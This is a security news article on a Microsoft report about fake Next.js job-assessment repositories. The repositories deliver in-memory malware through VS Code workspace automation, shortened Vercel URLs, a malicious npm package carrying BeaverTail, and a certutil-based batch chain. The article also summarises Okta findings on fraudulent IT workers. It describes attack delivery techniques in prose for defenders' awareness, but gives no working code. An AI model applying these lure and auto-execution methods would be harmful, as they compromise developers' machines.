Microsoft Warns Developers of Fake Next.js Job Repos Delivering In-Memory Malware

Malicious repositories masquerading as authentic Next.js projects and technical evaluations are being used in a "coordinated developer-targeting campaign" to fool victims into running them and gain ongoing access to compromised computers. In a report released this week, the Microsoft Defender Security Research Team stated, "The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution." The campaign, according to the tech giant, is distinguished by the use of several entry points that result in the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to enable command-and-control (C2).

The attacks rely on threat actors creating phony repositories with names like "Cryptan-Platform-MVP1" on reliable developer platforms like Bitbucket in order to fool job seekers into completing an assessment. Additional examination of the discovered repositories has revealed three different execution paths that, although they are initiated in different ways, ultimately aim to run attacker-controlled JavaScript directly in memory: Visual Studio Code workspace execution, in which malicious code retrieved from a Vercel domain is executed by Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration as soon as the developer opens and trusts the project. Another method hides Vercel URLs by using URL shorteners such as short[.

]gy.

The cybersecurity firm reported that it also discovered the "eslint-validator" malicious npm package, which is connected to the campaign and retrieves and executes an obfuscated payload from a Google Drive URL. The payload in question is BeaverTail, a well-known JavaScript malware. Additionally, it has been discovered that a malicious VS Code task embedded in a GitHub repository can start a Windows-only infection chain that uses a batch script to download the host's Node.js runtime (if it doesn't already exist) and use the certutil application to parse a code block inside the script.

After the script has been decoded, a Python malware protected by PyArmor is deployed using the previously acquired Node.js runtime.

"A high degree of operational resiliency and money laundering flexibility is provided by this cell's demonstrated ability to cultivate facilitators globally." According to a report released earlier this month, Okta stated that the "vast majority" of IT worker interviews end without a follow-up interview or job offer, but that they are "learning from their mistakes" and that many of them look for temporary contract work as software developers hired out to third-party companies in order to take advantage of the fact that they are unlikely to enforce stringent background checks. It also stated that "some actors seem to be more competent at crafting personas and passing screening interviews."

There is a sort of natural selection for IT workers.

The most successful actors set up hundreds of interviews each and are extremely prolific.